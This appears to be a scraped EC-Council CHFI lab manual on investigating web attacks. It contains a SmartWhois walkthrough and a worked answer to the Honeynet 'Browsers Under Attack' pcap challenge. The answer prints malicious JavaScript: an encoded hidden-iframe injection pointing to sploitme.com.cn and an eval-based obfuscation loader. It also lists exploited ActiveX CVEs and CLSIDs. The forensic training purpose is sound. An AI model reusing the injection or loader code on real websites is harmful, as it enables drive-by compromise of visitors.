Professional Documents
Culture Documents
Investigating Web Attacks: CHFI Lab Manual
Investigating Web Attacks: CHFI Lab Manual
Investigating Web
Attacks
Module 18
Module 18 – Investigating Web Attacks
1
Lab
Lab Duration
Time: 15 Minutes
CHFI Lab Manual Page 2 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Overview of SmartWhois
SmartWhois is a useful network information utility that allows you to look up all the
available information about an IP address, hostname, or domain, including
country, state or province, city, name of the network provider, administrator, and
technical support contact information. It helps you find answers to these important
questions:
Who is the owner of the domain?
When was the domain registered, and what is the owner's contact
information?
Who is the owner of the IP address block?
Lab Tasks
T A S K 1 1. Navigate to C:\CHFI - Tools\CHFI v8 Module 18 Investigating Web
Attacks\Tools for Locating IP Address\SmartWhois.
Launching
SmartWhois 2. Double-click setup.exe to launch the setup, and follow the wizard-
driven installation instructions.
3. To launch the SmartWhois tool, navigate to Start All Programs
SmartWhois SmartWhois.
T A S K 2
4. To perform a domain name query, type a domain name in the IP, host or
domain field. Click the down arrow next to the Query button and then
Performing
select As Domain from the drop-down list. Consider www.google.com as
Domain Name
Query
an example for domain name query.
CHFI Lab Manual Page 3 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Features:
Looks up whois data in the
right database
Integration with Microsoft
Internet Explorer and
Microsoft Outlook
Saving results into an FIGURE 1.2: SmartWhois domain name query
archive
Batch processing of IP
5. SmartWhois will process the query and display the results.
addresses or domain lists
Caching of obtained results
Hostname resolution and
DNS caching
Wildcard queries
Whois console for custom
queries
Country code reference
SOCKS5 firewall support
CHFI Lab Manual Page 4 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Tools
demonstrated in
this lab are
available in
C:\CHFI -
Tools\CHFI v8
Module 18 FIGURE 1.5: SmartWhois hostname query
Investigating Web
Attacks 8. SmartWhois will process the query and display the results.
CHFI Lab Manual Page 5 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Note: You can perform another query with or without clearing the history.
T A S K 5
9. To perform an IP address query, type an IP address in the IP, host or
domain field. Click the down arrow next to the Query button and then
Performing IP select As IP address/Hostname from the drop-down list. Consider 10.0.0.8
Address Query as an example for IP address query.
10. SmartWhois will process the query and display the results.
CHFI Lab Manual Page 6 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
SmartWhois is 12. SmartWhois will process the query and display the results. In the left pane
integrated with CommView of the window, the result displays, and in the right pane, the text area
Network Monitor.
displays the results of your query.
CHFI Lab Manual Page 7 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Note: To see the results of domain name or host name query, switch among the
results displayed in the left pane of the window.
T A S K 7
13. You can also save the results for future reference. To save the results, go to
File Save. It will display the options. Choose the options according to
Saving the
Results
your requirement.
14. Type the file name for the results and click the Browse Folders button.
CHFI Lab Manual Page 8 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
15. Browse the location where you want to save the file and then click the Save
button. (Here we select Desktop for saving the file.)
SmartWhois supports
Internationalized Domain
Names (IDNs).
CHFI Lab Manual Page 9 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
17. Browse to the location where you saved the results, select the file, and then
click Open.
Tools
demonstrated in
this lab are
available in
C:\CHFI -
Tools\CHFI v8
Module 18
Investigating Web
Attacks
CHFI Lab Manual Page 10 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Lab Analysis
Analyze and document the results related to the lab exercise. Give your opinion on
your target’s security posture and exposure.
Questions
1. Determine the other tools for analyzing IP addresses.
CHFI Lab Manual Page 11 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
2
Lab
I C O N K E Y The Challenge
Valuable A network trace with attack data is provided. (Note: The IP address of the
information
victim has been changed to hide the true location.)
Test your
knowledge Navigate to D:\Evidence Files\Forensics Challenges\HONEYNET
Challenges\Challenge 2 of the Forensic Challenge 2010 - Browsers Under
Web exercise Attack. Analyze the suspicious-time.pcap and answer the following questions:
Workbook review 1. List the protocols found in the capture. What protocol do you think the
attack is/are based on?
2. List IPs, hosts names/domain names. What can you tell about it -
extrapolate? What to deduce from the setup? Does it look like real
situations?
3. List all the web pages. List those visited containing suspect and possibly
malicious java script and who's is connecting to it? Briefly describe the
nature of the malicious web pages.
4. Can you sketch an overview of the general actions performed by the
attacker?
5. What steps are taken to slow the analysis down?
6. Provide the java scripts from the pages identified in the previous
question. Decode/deobfuscate them too.
7. On the malicious URLs at what do you think the variable’s’ refers to?
List the differences.
CHFI Lab Manual Page 12 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Challenge Result
Note: The tools and methodologies used here, and results obtained are provided for
your reference. The actual results may vary according to your selection of tools and
methodologies.
1. Tools used: Wireshark
The capture shows lots of protocols.
Lower level: IP, ARP, ICMP, UDP, TCP, IGMP.
Higher level: DHCP, HTTP, NetBIOS, DNS.
The analysis suggests that protocol used in attacks is HTTP/TCP.
CHFI Lab Manual Page 13 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
A fake 404 page, with another Java script fragment that change
according to browser user agent visiting page.
d. sploitme.com.cn/fg/load.php?e=1
f. www.google.com/
g. www.google.fr/
h. www.google.fr/generate_204
i. shop.honeynet.sg/catalog/
Page with obfuscated fragment of Java script code that load URL
into an <IFRAME> (apparently a simulated hacked website)
j. sploitme.com.cn/?click=84c090bd86
k. sploitme.com.cn/fg/show.php?s=84c090bd86
n. sploitme.com.cn/fg/show.php
o. www.google-analytics.com
CHFI Lab Manual Page 14 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
i. Hacked web site with Java script injected code that force browser to
visit other web site
ii. Active attack web page (same web page
sploitme.com.cn/fg/show.php), that check visitors' browser user
agent and IP geo-location to choose if doing an attack and what kind
of attack.
iii. Service pages: root page of sploitme.com.cn/ (doing a redirect via
header 302 FOUND); page sploitme.com.cn/fg/load.php (to get
malware executable, selected from URL parameter 'e'); page
sploitme.com.cn/fg/directshow.php (to get specially crafted files, to
exploit some vulnerability, i.e. a fake JPG file)
In that page there is a server side code that checks for browser user
agents, and emits another deeply obfuscated Java script code that tries
various exploits to execute code in victim's machine, without requiring
user action.
There is an evidence in the capture (pkt#299 to pkt#366) that shows
the ability to detect country of visitors, probably through GeoIP, and
select visitors only from (or exclude from) a country to apply for
malicious web pages.
Evidence is that Google redirects visitors that ask for www.google.com
to a nearest server, with appropriate language. In the capture there is a
visit to Google that redirect visitor to www.google.fr and the visit that
occur immediately after, to simulated hacked website (the simulated
RapidShare) that redirect browser to malicious web site
(sploitme.com.cn), it gets a harmless page, that does not contain any
Java script at all (pkt#366).
CHFI Lab Manual Page 15 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
Attack coming from another host, that never appear in normal code,
but only in obfuscated one, so it is impossible to know it, without
decode Java script code. Even if someone decode the Java script, and go
on attacker's host, it will see a 404 page, a fake with other Java script
code, deeply obfuscated.
So, one step is to slow down the discover of malicious code injected in
hacked web pages (obfuscation, iframes, CSS style visibility:hidden),
one to slow down the identification of the source of attacks
(obfuscation, fake 404 pages, encoded URLs) and finally a deeply
obfuscation of real Java script exploit code, that slow down analysis at
all.
One more step is that shell code in Java script is coded with Unicode
escape sequence (%u) and it is not trivial to extract the real binary
code of shellcodes. Another step can be the check made on browser
user agent: who use other operating systems or browsers (like most
Security professionals) gets only harmless code.
Deobfuscated:
document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63
%3D%22%68%74%74%70%3A%2F%2F%73%70%6C%6F%69%74%6D%65%2
E%63%6F%6D%2E%63%6E%2F%3F%63%6C%69%63%6B%3D%33%66%65%
62%35%61%36%62%32%66%22%77%69%64%74%68%3D%31%20%68%65
%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%6
9%62%69%6C%69%74%79%3A%20%68%69%64%64%65%6E%22%3E%3C%
2F%69%66%72%61%6D%65%3E%0A"));
2nd Deobfuscation:
<iframe src="http://sploitme.com.cn/?click=3feb5a6b2f"width=1
height=1 style="visibility: hidden"></iframe>
CHFI Lab Manual Page 16 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
CRYPT={signature:'CGerjg56R',_keyStr:'ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz0123456789+/=',decode:function(input){var
output='';var chr1,chr2,chr3;var enc1,enc2,enc3,enc4; var
i=0;input=input.replace(/[^A-Za-z0-9\+\/\=]/g,'');
while(i<input.length){enc1=this._keyStr.indexOf(input.charAt(i++));enc2=this.
_keyStr.indexOf(input.charAt(i++));enc3=this._keyStr.indexOf(input.charAt(i+
+));enc4=this._keyStr.indexOf(input.charAt(i++));chr1=(enc1<<2)|(enc2>>4);c
hr2=((enc2&15)<<4)|(enc3>>2);chr3=((enc3&3)<<6)|enc4;output=output+Stri
ng.fromCharCode(chr1);if(enc3!=64){output=output+String.fromCharCode(chr
2);}if(enc4!=64){output=output+String.fromCharCode(chr3);}}output=CRYPT._
utf8_decode(output);return output;},_utf8_decode:function(utftext){var
string='';var
i=0;varc=0,c1=0,c2=0,c3=0;while(i<utftext.length){c=utftext.charCodeAt(i);if(
c<128){string+=String.fromCharCode(c);i++;}elseif((c>191)&&(c<224)){c2=utf
text.charCodeAt(i+1);string+=String.fromCharCode(((c&31)<<6)|(c2&63));i+=
2;}else{c2=utftext.charCodeAt(i+1);c3=utftext.charCodeAt(i+2);string+=Strin
g.fromCharCode(((c&15)<<12)|((c2&63)<<6)|(c3&63));i+=3;}}return
string;},obfuscate:function(str){var
container='';for(vari=0,z=0;i<str.length;i=i+3,z++){container+=String.fromCha
rCode(str.substring(i,i+3)-
this.signature.substring(z%this.signature.length,z%this.signature.length+1).
charCodeAt(0));}return CRYPT.decode(container);}}
eval(CRYPT.obfuscate('1571811872311951541351661801171232041951561
601691531531871792011851912141281421981891611891961912001401031
901651221871621811701531691801171492052141772111711521871201822
002231922121261221301701442101842112011041401301461801752291951
901061681561881902221911741681721291661831281682231961521511631
601151681881712231761221321931571581792281891891181651571551871
512031941761561531911531911812011591521511252011221711731881592
041041281901661551502311961911521571631541491492111941931611411
511241761982231922091531211851721551891921582011401732031431792
051921901721571391681371362061891902191101431321371191901642092
141431371901221711731881592041041281901661551502311961911521571
631541491492111941931611411511241761982231922091531211851721551
882222122021621112041651211911621822111571321661361751862001761
681581291661831281901641761511421041851781611842221612031251281
351681221752222051
871021711721551702042011751521301371541491192001841802111521421
681751701521952171781371701391561211711621951531561651721501791
562161941521101211911751801761861802111521381301241692112002212
011201622031571591831632052121051591591341441562132151891731301
911241901912011582141261611821371571681872211761581111911571921
582362031741101051581771372122131741601631441701491731902012182
071541221301871452111871631761581701601561591832251822131271581
801761532192121892061651301531571751991861842111281381981881611
891832232021031401991571382052312061901731691571511872132042112
071741441701361882002231922251521251391841701512001911931411581
301471551492191831861261661831181452092141781891741521871331192
002241922111321051311751691731922142041041281901671431872352042
CHFI Lab Manual Page 17 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
081191631711541912232041902191101561631791391991641552221511251
68115161184217218182172115143'));
Deobfuscated:
function Complete(){setTimeout('location.href = "about:blank',2000);}
function CheckIP(){var req=null;try{req=new
ActiveXObject("Msxml2.XMLHTTP");}catch(e){try{req=new
ActiveXObject("Microsoft.XMLHTTP");}catch(e){try{req=new
XMLHttpRequest();}catch(e){}}}
if(req==null)return"0";req.open("GET","/fg/show.php?get_ajax=1&r="+Math.ra
ndom(),false);req.send(null);if(req.responseText=="1"){return
true;}else{return false;}}
Complete();
CHFI Lab Manual Page 18 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
iv. Two vulnerabilities in Windows Update Web Control, but access are
limited only to Microsoft websites, so attackers must work with
DNS poisoning or spoofing and SSL hijacking or MITM.
v. MS06-073, CVE-2006-4704 - Cross-zone scripting vulnerability in
the WMI Object Broker (WMIScriptUtils.WMIObjectBroker2)
ActiveX control (WmiScriptUtils.dll) in Microsoft Visual Studio
2005
vi. Some Visual Studio components (CLSID 06723E09-F4C2-43c8-
8358-09FCD1DB0766], 639F725F-1B2D-4831-A9FD-
874847682010, BA018599-1DB3-44f9-83B4-461454C84BF8,
D0C07D56-7C69-43F1-B4A0-25F5A11FAB19, E8CCCDDF-
CA28-496b-B050-6C07C962476B)
vii. MS09-032, MS09-037, CVE-2008-0015 - Stack-based buffer
overflow in the CComVariant::ReadFromStream function in the
Active Template Library (ATL), as used in the
MPEG2TuneRequest ActiveX control in msvidctl.dll in
DirectShow, and a buffer overflow vulnerability in AOL Radio
ActiveX, using same vulnerabilities
viii. CVE-2008-2463, MS08-041 - Vulnerability in the ActiveX Control
for the Snapshot Viewer for Microsoft Access Could Allow Remote
Code Execution
ix. MS05-052, CVE-2005-2127 - a variant of the COM Object
Instantiation Memory Corruption vulnerability.
CHFI Lab Manual Page 19 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
CHFI Lab Manual Page 20 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
CHFI Lab Manual Page 21 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
CHFI Lab Manual Page 22 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
52312bb96ce72f230f0350e78873f791 SHA1:
1f613d5260621e4d6737557c68fdc6d322595ef0).
All executables are downloaded in using directory found in TEMP
process environment variable and executed. Virustotal.com does not
identify files as threat (analysis report link is:
http://www.virustotal.com/it/analisis/89713a2cf36c4f3552100b0b15907249e
80e1e5f648a3901fa92ab09aae4a55f-1267745617)
Using strings -a, it can be discovered that there are some interesting
strings in the executables:
a. "C:\Program Files\Internet Explorer\iexplore.exe" "%s"
b. Starting IE
c. urlRetriever|http://www.honeynet.org
Lab Analysis
Analyze and document the results related to the lab exercise.
CHFI Lab Manual Page 23 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
3
Lab
CHFI Lab Manual Page 24 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 18 – Investigating Web Attacks
CHFI Lab Manual Page 25 Computer Hacking Forensic Investigator Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.